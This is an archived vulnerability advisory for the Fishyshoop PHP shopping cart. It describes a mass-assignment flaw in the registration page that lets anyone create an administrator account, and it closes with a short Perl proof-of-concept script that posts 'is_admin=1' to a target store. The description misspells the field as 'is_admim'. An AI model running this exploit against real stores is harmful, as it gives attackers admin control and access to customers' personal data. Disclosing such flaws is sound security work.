AOH :: HP Unsorted F :: C07-1476.HTM

Fishyshoop Security Vulnerability



Fishyshoop Security Vulnerability
Fishyshoop Security Vulnerability



Synopsis
=======The Fishyshoop shopping cart software contains a vulnerability which
allows arbitrary users to create accounts with administrator
privileges

Background
=========Fishyshoop is a suite of PHP scripts allowing anybody to create an
attractive online store.

Affected Versions
================Verified on 0.930 beta. Previous versions may also be affected.

Impact
=====The user gains administrator privileges in the software, meaning they
are free to alter many aspects of the store, as well as committing
theft of personal information belonging to other users of the store.

Description
==========pages/register/register.php takes every POST variable and inserts the
value into a new record under a field with the same name. If a new
registration is made with the variable is_admim set to 1, the account
will have administrator privileges on the site.

Proof of Concept
===============#!/usr/bin/perl

use WWW::Curl::Easy;

sub usage() {
  print "$0   \n";
  exit();
}

$FSURL=shift or usage(); $UNAME=shift or usage(); $PASS=shift or usage();

my $fishyshoop = new WWW::Curl::Easy;
$fishyshoop->setopt(CURLOPT_URL, "$FSURL?L=register.register");
$fishyshoop->setopt(CURLOPT_POST, 1);
$fishyshoop->setopt(CURLOPT_POSTFIELDS,
"email=$UNAME&password=$PASS&is_admin=1&submit=1");
$fishyshoop->perform;

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.